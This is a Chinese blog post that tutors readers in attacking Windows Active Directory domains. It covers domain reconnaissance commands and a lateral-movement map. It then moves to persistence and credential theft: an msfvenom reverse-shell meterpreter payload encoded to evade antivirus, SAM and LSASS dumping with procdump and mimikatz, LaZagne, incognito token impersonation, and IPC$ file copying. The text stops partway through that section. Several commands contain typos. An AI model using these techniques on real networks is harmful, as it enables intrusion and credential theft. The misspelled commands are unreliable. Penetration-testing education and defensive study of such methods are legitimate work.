<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="内网渗透之初识域渗透"><meta name="keywords" content="域渗透,内网渗透,域"><meta name="author" content="Ch4ce"><meta name="copyright" content="Ch4ce"><title>内网渗透之初识域渗透 | Chaceshadow's Blog</title><link rel="shortcut icon" href="/favicon.png"><link rel="stylesheet" href="/css/index.css?version=1.7.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.7.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"./public/atom.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  }
} </script><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="Chaceshadow's Blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#内网渗透之初识域渗透"><span class="toc-text">内网渗透之初识域渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-初识域环境"><span class="toc-text">0x01 初识域环境</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#一、什么是域"><span class="toc-text">一、什么是域</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#二、域的优点-为什么使用域"><span class="toc-text">二、域的优点(为什么使用域)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1、权限管理比较集中，管理成本降低"><span class="toc-text">1、权限管理比较集中，管理成本降低</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2、保密性加强"><span class="toc-text">2、保密性加强</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3、安全性加强"><span class="toc-text">3、安全性加强</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4、提高了便捷性"><span class="toc-text">4、提高了便捷性</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#三、域的基本名词解释"><span class="toc-text">三、域的基本名词解释</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1、域控制器（DC）"><span class="toc-text">1、域控制器（DC）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2、活动目录（Active-Directory）"><span class="toc-text">2、活动目录（Active Directory）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3、域用户"><span class="toc-text">3、域用户</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4、域管"><span class="toc-text">4、域管</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-、域用户组"><span class="toc-text">5 、域用户组</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#域组的类型"><span class="toc-text">域组的类型</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#域组的使用领域"><span class="toc-text">域组的使用领域</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6、信任域"><span class="toc-text">6、信任域</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-域信息收集"><span class="toc-text">0x02 域信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#一、nltes查询信任域"><span class="toc-text">一、nltes查询信任域</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#二、域环境信息收集"><span class="toc-text">二、域环境信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1、Csvde"><span class="toc-text">1、Csvde</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2、Setspn"><span class="toc-text">2、Setspn</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3、Dnsdump"><span class="toc-text">3、Dnsdump</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4、nbtscan"><span class="toc-text">4、nbtscan</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-域渗透思路"><span class="toc-text">0x03 域渗透思路</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#一、渗透思路"><span class="toc-text">一、渗透思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#二、权限维持"><span class="toc-text">二、权限维持</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1、DLL文件加载shellcode免杀上线"><span class="toc-text">1、DLL文件加载shellcode免杀上线</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2、注册表读取密码"><span class="toc-text">2、注册表读取密码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3、Lsass读取内存hash"><span class="toc-text">3、Lsass读取内存hash</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4、LaZagne工具获取密码"><span class="toc-text">4、LaZagne工具获取密码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5、凭证窃取"><span class="toc-text">5、凭证窃取</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6、命令行渗透"><span class="toc-text">6、命令行渗透</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#a、为什么命令行渗透？"><span class="toc-text">a、为什么命令行渗透？</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#b、建立IPC连接执行命令"><span class="toc-text">b、建立IPC连接执行命令</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#c-、Schtasks计划任务执行命令"><span class="toc-text">c 、Schtasks计划任务执行命令</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#d、psexec执行命令"><span class="toc-text">d、psexec执行命令</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#e、命令行下载文件"><span class="toc-text">e、命令行下载文件</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#7、获取内网代理"><span class="toc-text">7、获取内网代理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#8、windows-api使用"><span class="toc-text">8、windows api使用</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#9、导出域hash"><span class="toc-text">9、导出域hash</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-参考资料"><span class="toc-text">0x04 参考资料</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Ch4ce</div><div class="author-info__description text-center">孟冬</div><div class="follow-button"><a href="https://github.com/Chaceshadow" target="_blank" rel="noopener">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">18</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">45</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">6</span></a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/welcome-image.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Chaceshadow's Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/gallery">Gallery</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a></span></div><div id="post-info"><div id="post-title">内网渗透之初识域渗透</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-09-29</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="内网渗透之初识域渗透"><a href="#内网渗透之初识域渗透" class="headerlink" title="内网渗透之初识域渗透"></a>内网渗透之初识域渗透</h1><h2 id="0x01-初识域环境"><a href="#0x01-初识域环境" class="headerlink" title="0x01 初识域环境"></a>0x01 初识域环境</h2><h3 id="一、什么是域"><a href="#一、什么是域" class="headerlink" title="一、什么是域"></a>一、什么是域</h3><p>将网络中多台计算机逻辑上组织到一起，进行集中管理，这种区别于工作组的逻辑环境叫做域，域是组织与存储资源的核心管理单元，在域中，至少有一台域控制器，域控制器中保存着整个域的用户帐号和安全数据库。</p>
<a id="more"></a>

<h3 id="二、域的优点-为什么使用域"><a href="#二、域的优点-为什么使用域" class="headerlink" title="二、域的优点(为什么使用域)"></a>二、域的优点(为什么使用域)</h3><p>那么域网络结构有什么优点呢？域的优点主要有以下几个方面：</p>
<h4 id="1、权限管理比较集中，管理成本降低"><a href="#1、权限管理比较集中，管理成本降低" class="headerlink" title="1、权限管理比较集中，管理成本降低"></a>1、权限管理比较集中，管理成本降低</h4><p>域环境中，所有的网络资源，包括用户均是在域控制器上维护的，便于集中管理，所有用户只要登入到域，均能在域内进行身份验证，管理人员可以较好的管理计算机资源，管理网络的成本大大降低；同时在域环境中也可以防止企业员工在域成员主机上违规安装软件，增强客户端安全性，减少客户端故障，降低维护成本。</p>
<h4 id="2、保密性加强"><a href="#2、保密性加强" class="headerlink" title="2、保密性加强"></a>2、保密性加强</h4><p>有利于企业的一些保密资料的管理，可以单独对资源进行权限控制，允许或拒绝特定的域账户对资源的请求。</p>
<h4 id="3、安全性加强"><a href="#3、安全性加强" class="headerlink" title="3、安全性加强"></a>3、安全性加强</h4><p>使用漫游账户和文件夹重定向，个人账户的工作文件及数据等可以存储在服务器上，进行统一备份及管理，使用户的数据更加安全有保障；同时域控制器能够分发应用程序、系统补丁，用户可以选择安装，也可以由系统管理员指派自动安装，数据及系统安全性大大提高。</p>
<h4 id="4、提高了便捷性"><a href="#4、提高了便捷性" class="headerlink" title="4、提高了便捷性"></a>4、提高了便捷性</h4><p>可由管理员指派登陆脚本映射，用户登录后就可以像使用本地盘符一样，使用网络上的资源，且不需要再次输入密码。</p>
<p>基于以上原因，很多企业的内网均会采用域环境，所以作为一名合格的渗透测试人员，域渗透的常规思路和技巧要熟练掌握。</p>
<h3 id="三、域的基本名词解释"><a href="#三、域的基本名词解释" class="headerlink" title="三、域的基本名词解释"></a>三、域的基本名词解释</h3><h4 id="1、域控制器（DC）"><a href="#1、域控制器（DC）" class="headerlink" title="1、域控制器（DC）"></a>1、域控制器（DC）</h4><p>域控制器是指在“域”模式下，至少有一台服务器负责每一台联入网络的电脑和用户的验证工作，相当于一个单位的门卫一样，称为“域控制器（Domain Controller，简写为DC）”，简称域控。</p>
<p>域控制器( Domain controller，DC)是活动目录的存储位置,安装了活动目录的计算机称为域控制器。在第一次安装活动目录时,安装活动目录的那台计算机就成为域控制器,简称“域控”。域控制器存储着目录数据并管理用户域的交互关系,其中包括用户登录过程、身份验证和目录搜索等。一个域可以有多个域控制器。为了获得高可用性和容错能力,规模较小的域只需两个域控制器,一个实际使用,另一个用于容错性检査;规模较大的域可以使用多个域控制器。</p>
<h4 id="2、活动目录（Active-Directory）"><a href="#2、活动目录（Active-Directory）" class="headerlink" title="2、活动目录（Active Directory）"></a>2、活动目录（Active Directory）</h4><p>活动目录（Active Directory）是面向Windows Standard Server、Windows Enterprise Server以及 Windows Datacenter Server的<a href="https://baike.baidu.com/item/目录服务/10413830" target="_blank" rel="noopener">目录服务</a>。<a href="https://baike.baidu.com/item/活动目录服务/927529" target="_blank" rel="noopener">活动目录服务</a>是Windows Server 2000操作系统平台的中心组件之一。（Active Directory不能运行在Windows Web Server上，但是可以通过它对运行Windows Web Server的计算机进行管理。）</p>
<p>Active Directory存储了有关网络对象的信息，并且让管理员和用户能够轻松地查找和使用这些信息。目录包含了有关各种对象 [例如用户、用户组、计算机、域、组织单位（OU）以及安全策略] 的信息。Active Directory使用了一种结构化的数据存储方式，并以此作为基础对目录信息进行合乎逻辑的分层组织。</p>
<h4 id="3、域用户"><a href="#3、域用户" class="headerlink" title="3、域用户"></a>3、域用户</h4><p>域用户帐号是在域的domain users组中，本地用户账户在本地user组中。</p>
<p>在计算机加入域时，会把domain users组添加到user组中。因此对客户机来说，两者完全是一样的。</p>
<p>区别只在于当其他客户机也加入域时，也添加了domain users组，因此域用户帐号还可以访问其他客户机。 用户名和密码到域控制器验证，域账户可以在任意一台加入域的电脑上登陆，多台电脑也可以同时登陆一个用户。</p>
<h4 id="4、域管"><a href="#4、域管" class="headerlink" title="4、域管"></a>4、域管</h4><p>登录到域控制器上，对一切权限进行控制，而不用到每一台域机器电脑前进行设置。</p>
<h4 id="5-、域用户组"><a href="#5-、域用户组" class="headerlink" title="5 、域用户组"></a>5 、域用户组</h4><p>公司很多员工的权限都是相同的，那我们可以通过使用分组将不同的用户放入不同的分组，对这些相同的权限只需要设置一次，然后将改权限分配给该组。免去了对每个用户进行设置的麻烦。</p>
<h5 id="域组的类型"><a href="#域组的类型" class="headerlink" title="域组的类型"></a>域组的类型</h5><ol>
<li><p><a href="https://baike.baidu.com/item/安全组" target="_blank" rel="noopener">安全组</a>：主要用来设置权限用的。也可用在与安全无关的任务上，如：通过E-mail软件将E-mail发送给某个分布式组。</p>
</li>
<li><p>分布式组：用在与安全无关的任务上。如：通过E-mail软件将E-mail发送给某个分布式组，（应用程序须支持AD才可使用分布式组）。无法设置分布式组的权限。</p>
</li>
</ol>
<h5 id="域组的使用领域"><a href="#域组的使用领域" class="headerlink" title="域组的使用领域"></a>域组的使用领域</h5><p>从组的使用领域来分，win2003域组可分为以下三类：<a href="https://baike.baidu.com/item/全局组" target="_blank" rel="noopener">全局组</a>、本地域组、<a href="https://baike.baidu.com/item/通用组" target="_blank" rel="noopener">通用组</a></p>
<ol>
<li><a href="https://baike.baidu.com/item/全局组" target="_blank" rel="noopener">全局组</a>：</li>
</ol>
<ul>
<li>成员范围：只能包含所属域内的用户和<a href="https://baike.baidu.com/item/全局组" target="_blank" rel="noopener">全局组</a>；</li>
<li>可访问资源范围：可以访问所有域的资源。</li>
</ul>
<ol start="2">
<li>本地域组</li>
</ol>
<ul>
<li>成员范围：所有域内的用户、<a href="https://baike.baidu.com/item/全局组" target="_blank" rel="noopener">全局组</a>、<a href="https://baike.baidu.com/item/通用组" target="_blank" rel="noopener">通用组</a>，所属域内的本地域组；</li>
<li>可访问资源范围：只可访问所属域的资源。</li>
</ul>
<ol start="3">
<li><a href="https://baike.baidu.com/item/通用组" target="_blank" rel="noopener">通用组</a></li>
</ol>
<ul>
<li>成员范围：所有域内的用户、<a href="https://baike.baidu.com/item/全局组" target="_blank" rel="noopener">全局组</a>、<a href="https://baike.baidu.com/item/通用组" target="_blank" rel="noopener">通用组</a>；</li>
<li>可访问资源范围：可以访问所有域的资源。</li>
</ul>
<p>注：1）域功能级别为win2000混合模式时不支持<a href="https://baike.baidu.com/item/通用组" target="_blank" rel="noopener">通用组</a>；2）域功能级别为win2000混合模式时不支持<a href="https://baike.baidu.com/item/全局组" target="_blank" rel="noopener">全局组</a>嵌套。</p>
<h4 id="6、信任域"><a href="#6、信任域" class="headerlink" title="6、信任域"></a>6、信任域</h4><p>在很多实际情况中，一个又有下面的子公司，所以就造成母公司有一个域，子公司有也有一个单独的域。母公司的域与子公司的域如何联系起来呢？我们可以在它们之间建立一种叫信任( Trust)的关系。如果母公司的帐户想要能够登录到子公司的域中，子公司的域就要对母公司的减建立信任关系。当母公司域的帐户想要登录到子公司域中时，子公司域由于信任母公司的域，所以它会听从从母公司域的域控制器返回的 access key。反过来,由于母公司的域没有建立对子公司的信任，所以如果子公司的帐户想要登录到母公司的域中是不可能的</p>
<p>/ domain trusts返回受信任域的列表</p>
<h2 id="0x02-域信息收集"><a href="#0x02-域信息收集" class="headerlink" title="0x02 域信息收集"></a>0x02 域信息收集</h2><h3 id="一、nltes查询信任域"><a href="#一、nltes查询信任域" class="headerlink" title="一、nltes查询信任域"></a>一、nltes查询信任域</h3><p>信任域：可以在工作组里查询，查询内网里是否有域环境</p>
<p><code>nltest /domain_trusts /all_trusts /v /server:192.168.52.2</code> </p>
<p>返回所有信任192.168.52.2的域</p>
<p><code>nltest /dsgetdc:XXXX /server:192.168.52.2</code></p>
<p>返回域控和其相应的IP地址，XXXX是上一步结果中的一个域</p>
<p><img src="/2020/09/29/DomainPenetration/1.png" alt="image"></p>
<h3 id="二、域环境信息收集"><a href="#二、域环境信息收集" class="headerlink" title="二、域环境信息收集"></a>二、域环境信息收集</h3><h4 id="1、Csvde"><a href="#1、Csvde" class="headerlink" title="1、Csvde"></a>1、Csvde</h4><p>Csvde是windows Server 2008 的内置命令行工具，位于%windir%/system32文件夹中，如果您安装了AD DS或Activity Directory轻型目录服务（AD LDS）服务器角色，则此功能可用</p>
<p>适用于：Windows Server 2003，Windows Server 2008，Windows Server 2003 R2，Windows Server 2008 R2，Windows Server 2012，带有SP1，Windows 8的Windows Server 2003</p>
<p><code>csvde -setspn domain-f c:\domain.scv</code>， <code>domain</code> 是域名称，<code>c:\domain.scv</code>是保存路径和文件格式</p>
<p><img src="/2020/09/29/DomainPenetration/2.png" alt="image"></p>
<ul>
<li>LDAP的存储规则</li>
<li>区分名（DN，Distinguished Name）一个条目的区分名称叫做“dn”或者叫做区分名。在一个目录中这个名称总是唯一的。</li>
<li>CN=Common Name 为用户名或服务器名，最长可以到80个字符，可以为中文；</li>
<li>OU=Organization Unit为组织单元，最多可以有四级，每级最长32个字符，可以为中文；</li>
<li>O=Organization为组织名，可以3-64个字符长</li>
<li>C=Country为国家名，可选，为2个字符长</li>
</ul>
<p><img src="/2020/09/29/DomainPenetration/3.png" alt="image"></p>
<h4 id="2、Setspn"><a href="#2、Setspn" class="headerlink" title="2、Setspn"></a>2、Setspn</h4><p><code>setspn -T hack -Q */*</code></p>
<p>SPN官方名称即为“服务主体名称”，本质上存的就是域内各种服务资源的对应关系（对应的服务类型、机器名称、服务端口等）</p>
<p>借助SPN快速定位当前目标域中所有存活的各类服务器</p>
<p><img src="/2020/09/29/DomainPenetration/4.png" alt="image"></p>
<h4 id="3、Dnsdump"><a href="#3、Dnsdump" class="headerlink" title="3、Dnsdump"></a>3、Dnsdump</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">dnsdump.exe -u 域名\域用户 -p 域密码 域孔机器名</span><br><span class="line">dnsdump.exe -u hack\iis_user -p 1qaz@WSX windows_server_2016_dc -r</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/5.png" alt="image"></p>
<p>4 、Net</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">net user &#x2F;domain						获取用户列表</span><br><span class="line">net group &quot;domain admin&quot; &#x2F;domain		获取与管理员列表</span><br><span class="line">net group &quot;domain controllers&quot; &#x2F;domain	查看域控制器（数量）</span><br><span class="line">net group &quot;domain computers&quot; &#x2F;domain 	查看域机器</span><br><span class="line">net group &#x2F;domain 						查询域里面的组</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/6.png" alt="image"></p>
<p><img src="/2020/09/29/DomainPenetration/7.png" alt="image"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">net view				查看同一域内机器列表</span><br><span class="line">net view \\ip			查看某IP共享</span><br><span class="line">net view \\GHQ			查看GHQ计算机的共享资源列表</span><br><span class="line">net view &#x2F;domain		查看内网存在多少个域</span><br><span class="line">net view &#x2F;domain:XYZ	查看XYZ域中的机器列表</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/8.png" alt="image"></p>
<h4 id="4、nbtscan"><a href="#4、nbtscan" class="headerlink" title="4、nbtscan"></a>4、nbtscan</h4><p><code>nbtscan.exe 192.168.52.0/24</code></p>
<p><img src="/2020/09/29/DomainPenetration/9.png" alt="image"></p>
<h2 id="0x03-域渗透思路"><a href="#0x03-域渗透思路" class="headerlink" title="0x03 域渗透思路"></a>0x03 域渗透思路</h2><h3 id="一、渗透思路"><a href="#一、渗透思路" class="headerlink" title="一、渗透思路"></a>一、渗透思路</h3><p>横向渗透 - &gt; 权限维持 - &gt;取密码(获取一个域用户账号密码)  - &gt;域信息收集 - &gt;横向渗透 - &gt;取密码 - &gt;获取域管权限 - &gt;拿下域控服务器</p>
<p>横向渗透的思路（适用于工作组渗透和域渗透）</p>
<p><img src="/2020/09/29/DomainPenetration/10.png" alt="image"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">graph LR</span><br><span class="line">内网GetShell--&gt; A(弱口令)</span><br><span class="line">A --&gt; RDP,SMB弱口令</span><br><span class="line">A --&gt; SSH弱口令</span><br><span class="line">A --&gt; MSSQL弱口令</span><br><span class="line">A --&gt; Tomcat弱口令 --&gt; 使用python脚本war.py</span><br><span class="line">内网GetShell--&gt; B(未授权)</span><br><span class="line">内网GetShell--&gt; C(RCE)</span><br><span class="line">C --&gt; Jboss</span><br><span class="line">C --&gt; Weblogic&#x2F;扫描端口</span><br><span class="line">C --&gt; Struts2&#x2F;扫描内网web,后缀为action和do</span><br><span class="line">C --&gt; 致远OA&#x2F;通过内网扫描web标题找出致远OA漏洞</span><br><span class="line">内网GetShell--&gt; D(反序列化)</span><br><span class="line">D --&gt; Shiro&#x2F;Python脚本shio_vul.py</span><br><span class="line">D --&gt; RMI</span><br><span class="line">D --&gt; Jdwp</span><br></pre></td></tr></table></figure>

<h3 id="二、权限维持"><a href="#二、权限维持" class="headerlink" title="二、权限维持"></a>二、权限维持</h3><h4 id="1、DLL文件加载shellcode免杀上线"><a href="#1、DLL文件加载shellcode免杀上线" class="headerlink" title="1、DLL文件加载shellcode免杀上线"></a>1、DLL文件加载shellcode免杀上线</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp_uuid LPORT=9999 LHOST=192.168.1.1 -e X86/shikata_ga_nai -i 11 -f c -o shellcode.c</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msf &gt; use exploit/multi/handler</span><br><span class="line">msf &gt; set payload windows/meterpreter/reverse_tcp_uuid</span><br><span class="line">msf &gt; set lhost 192.168.1.1</span><br><span class="line">msf &gt; set lport 8888</span><br><span class="line">msf &gt; set EnableStageEncodeing true</span><br><span class="line">msf &gt; set StageEncoder X86/fnstenv_mov</span><br><span class="line">msf &gt; exploit</span><br></pre></td></tr></table></figure>

<p>生成的shellcode放入下图代码中标记的位置</p>
<p><img src="/2020/09/29/DomainPenetration/11.png" alt="image"></p>
<p>编译生成dll执行，成功上线</p>
<p><img src="/2020/09/29/DomainPenetration/12.png" alt="image"></p>
<h4 id="2、注册表读取密码"><a href="#2、注册表读取密码" class="headerlink" title="2、注册表读取密码"></a>2、注册表读取密码</h4><p>正常我们一般使用mimikatz读取密码，但是一般查毒软件都会查杀，下面我们通过注册表读取密码绕过查杀</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 获取注册表信息</span><br><span class="line">reg save HKLM\SYSTEM c:\windows\temp\Sys.hiv</span><br><span class="line">reg save HKLM\SAM c:\windows\temp\Sam.hiv</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 获取注册表密码文件后下载至本机</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; mimikatz运行解密命令获取hash NTLM ,然后通过MD5解密</span><br><span class="line">mimikatz.exe</span><br><span class="line">lsadump::sam &#x2F;sam:Sam.hiv &#x2F;system:Sys.hiv</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/13.png" alt="image"></p>
<h4 id="3、Lsass读取内存hash"><a href="#3、Lsass读取内存hash" class="headerlink" title="3、Lsass读取内存hash"></a>3、Lsass读取内存hash</h4><p>lsass进程获取内存hash，lsass.exe进程会保存机器登录过的用户密码（2008之前密码是明文存储，2012和2016都是密文hash存储）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;&#x2F; 在目标机器上执行procdump.exe</span><br><span class="line">procdumo.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp</span><br><span class="line"></span><br><span class="line">&#x2F;&#x2F; 在mimikatz中运行 结果保存在日志中</span><br><span class="line">mimikatz.exe &quot;sekurlas::minidump lsass.dmp&quot; &quot;log&quot; &quot;sekulsa::logonpasswords&quot;</span><br></pre></td></tr></table></figure>

<p>Win2012演示如下：</p>
<p><img src="/2020/09/29/DomainPenetration/14.png" alt="image"></p>
<p><img src="/2020/09/29/DomainPenetration/15.png" alt="image"></p>
<p>Win2008演示如下：</p>
<p><img src="/2020/09/29/DomainPenetration/16.png" alt="image"></p>
<h4 id="4、LaZagne工具获取密码"><a href="#4、LaZagne工具获取密码" class="headerlink" title="4、LaZagne工具获取密码"></a>4、LaZagne工具获取密码</h4><p>LaZagne取各种连接工具密码、浏览器保存密码等</p>
<p>下载地址：<code>https://github.com/AlessandroZ/LaZagne</code></p>
<p><img src="/2020/09/29/DomainPenetration/17.png" alt="image"></p>
<h4 id="5、凭证窃取"><a href="#5、凭证窃取" class="headerlink" title="5、凭证窃取"></a>5、凭证窃取</h4><p>通过tasklist /v查看进程用户，如果有域用户开启的进程，则可以通过凭证窃取域用户的进程</p>
<p>登录一台机器本地账户发现机器运行如下域用户进行</p>
<p><img src="/2020/09/29/DomainPenetration/18.png" alt="image"></p>
<p>通过incognito工具窃取凭据</p>
<p>下载地址1：<code>https://github.com/FSecureLABS/incognito</code></p>
<p>下载地址2：<code>https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">incognito.exe list_tokens -u</span><br><span class="line">incognito.exe execute -c &quot;HACK\Administrator&quot; cmd.exe</span><br></pre></td></tr></table></figure>

<p><img src="/2020/09/29/DomainPenetration/19.png" alt="image"></p>
<h4 id="6、命令行渗透"><a href="#6、命令行渗透" class="headerlink" title="6、命令行渗透"></a>6、命令行渗透</h4><h5 id="a、为什么命令行渗透？"><a href="#a、为什么命令行渗透？" class="headerlink" title="a、为什么命令行渗透？"></a>a、为什么命令行渗透？</h5><ul>
<li>远程登陆桌面增加暴露风险；</li>
<li>目标管理员可能对服务器禁用远程登陆。</li>
</ul>
<h5 id="b、建立IPC连接执行命令"><a href="#b、建立IPC连接执行命令" class="headerlink" title="b、建立IPC连接执行命令"></a>b、建立IPC连接执行命令</h5><ul>
<li>可以访问目标机器的文件（上传、下载），也可以在目标机器上运行命令。</li>
<li>上传和下载文件直接通过copy命令就可以，不过路径换成UNC路径。</li>
<li>何为UNC路径？简单来讲以\开头的路径就是UNC路径，比如\192.168.1.2\c$\users。</li>
</ul>
<p>如果要从本地当前目录上传1.bat到192.168.1.2机器C盘根目录下，那么命令就是</p>
<p><code>copy 1.bat \\192.168.1.2\C$\</code></p>
<p>反之就是下载</p>
<p>dir、copy、xcopy、move、type的参数都可使用UNC路径</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">net use \\192.168.52.2 &#x2F;u:hack\adminidtrator Windows2019***		建立IPC连接</span><br><span class="line">copy sbn.exe \\192.168.52.2\C$\windows\temp						复制本地文件到目标服务器</span><br><span class="line">copy \\192.168.52.2\C$\windows\temp\hash.txt					复制目标服务器文件到本地</span><br></pre></td></tr></table></figure>
